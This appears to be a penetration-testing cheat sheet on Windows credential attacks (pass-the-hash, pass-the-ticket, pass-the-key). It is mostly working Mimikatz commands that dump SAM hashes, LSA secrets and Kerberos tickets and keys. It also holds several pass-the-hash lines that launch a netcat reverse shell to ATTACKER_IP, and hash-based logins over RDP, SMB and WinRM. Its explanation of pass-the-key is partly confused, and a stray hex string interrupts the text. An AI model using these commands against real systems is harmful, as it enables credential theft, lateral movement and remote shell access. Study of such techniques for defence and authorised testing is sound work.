## General Alternate Authentication with Pass-the-Hash (PtH), Pass-the-Ticket (PtT), and Pass-the-Key (PtK) are methods for authenticating to a system without providing a plaintext password. Pass-the-Hash (PtH) is an attack technique that allows an attacker to use a stolen password hash to authenticate to a system, without needing to know the plaintext password. This can be done by capturing the NTLM or LM hash of a user's password, which is stored on a Windows system when the user logs in. Pass-the-Ticket (PtT) is an attack technique that allows an attacker to use a stolen Kerberos ticket to authenticate to a system, without needing to know the plaintext password. This can be done by capturing the Kerberos ticket that is issued to a user when they log in, and then using it to authenticate to other systems on the network. Pass-the-Key (PtK) is an attack technique that allows an attacker to use a stolen encryption key to decrypt sensitive data, without needing to know the plaintext password. This can be done by capturing the encryption key that is used to encrypt a user's data and then using it to decrypt the data. (Steal key encryption of tickets) All these methods are used by attackers to gain unauthorized access to a system by bypassing normal authentication mechanisms. PtH = Using the hash to connect PtT = Using ticket to connect PtK = LOCAL VS ACTIVE DIRECTORY While using tools such has mimikatz, you can gather local hash and active direcotry hash from users. Take note that mimikatz is not the only tool you can use to find hashes, tickets and keys ## Commands To begin, one must acquire some hashes, tickets, or keys. This can be done using tools such as Mimikatz. - Upload Mimikatz to the target System ## Alternate Authentication (PtH) ``` mimikatz # privilege::debug mimikatz # token::elevate # Local Users lsadump::sam # AD Users sekurlsa::msv #Setup Lisener (Attacking Machine) nc -lvnp PORT # Launch Reverse Shell (Using nc64 ont the other machine, you can use other technique to launch a reverse shell (Example smb/psexec in msfconsole)) sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:NTLM_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT" ``` - Other Technique to pass the hash RDP --> xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH SMB --> psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP WinRM -->evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH ## Alternate Authentication (PtT) ``` mimikatz # privilege::debug mimikatz # sekurlsa::tickets /export # We can inject the tickets into the current session kerberos::ptt [0;427fcd5]-2-0-40e10000-USER@MACHINE_DOMAIN (Change the tickets) # Check the if you have the tiket permission C:\> klist ``` ## Alternate Authentication (PtK) ``` mimikatz # privilege::debug mimikatz # sekurlsa::ekeys #Setup Lisener (Attacking Machine) nc -lvnp PORT ``` b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 **If we have the RC4 hash:** ```shell-session mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /rc4:RC4_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT" ``` **If we have the AES128 hash:** ```shell-session mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /aes128:AES128_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT" ``` **If we have the AES256 hash:** ```shell-session mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /aes256:AES256_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT" ``` ## Dump LSAdump ``` mimikatz # token::elevate mimikatz # lsadump::secrets ```